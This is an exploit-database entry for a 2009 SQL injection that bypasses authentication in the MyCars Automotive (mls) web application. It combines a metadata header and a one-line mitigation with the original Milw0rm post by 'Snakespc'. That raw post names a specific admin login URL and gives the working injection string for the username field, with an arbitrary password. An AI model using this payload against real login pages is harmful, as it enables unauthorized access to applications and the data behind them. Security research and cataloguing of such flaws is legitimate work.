MyCars Automotive (mls) (Auth Bypass) Remote Sql Injection

vendor:

MyCars Automotive (mls)

by:

Snakespc

7,5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: MyCars Automotive (mls)

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

MyCars Automotive (mls) (Auth Bypass) Remote Sql Injection

A vulnerability in the MyCars Automotive (mls) application allows an attacker to bypass authentication and gain access to the application. This is achieved by entering the username 'admin' or '1=1' and the password 'Super Cristal' into the login page.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#-------------------------AllaH AkbaR-------------------------------
#MyCars Automotive (mls) (Auth Bypass) Remote Sql Injection
#-------------------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com
#Site:www.snakespc.com/
#Declaration/ Oh wait spiders ---->>>>EL AYAM BAYNANA  
#            Aflawa Kamikaz Wa4rin Fi kol Bla4s 
#-------------------------SNAKES TEAM-------------------------------
#
#Script:Hostplanet
#
#Demo:http://jaredeckersley.com/mycars/
#
#
#--------------------------SNAKES TEAM------------------------------
#Exploit:
#--------
#Demo:http://jaredeckersley.com/mycars/mls/demo/admin/index.php
#Username:admin' or '1=1 
#Password:Super Cristal
#-------------------------SNAKES TEAM-------------------------------
#Mr.HCOCA_MAN DrEaDFuL yassine_enp His0k4 ThE g0bL!N
#--------------------------SNAKES TEAM------------------------------
#ALL www.SnakespC.com/sc>>>> (  Members )  >>>>Str0ke >>>>>>>Milw0rm

# milw0rm.com [2009-06-08]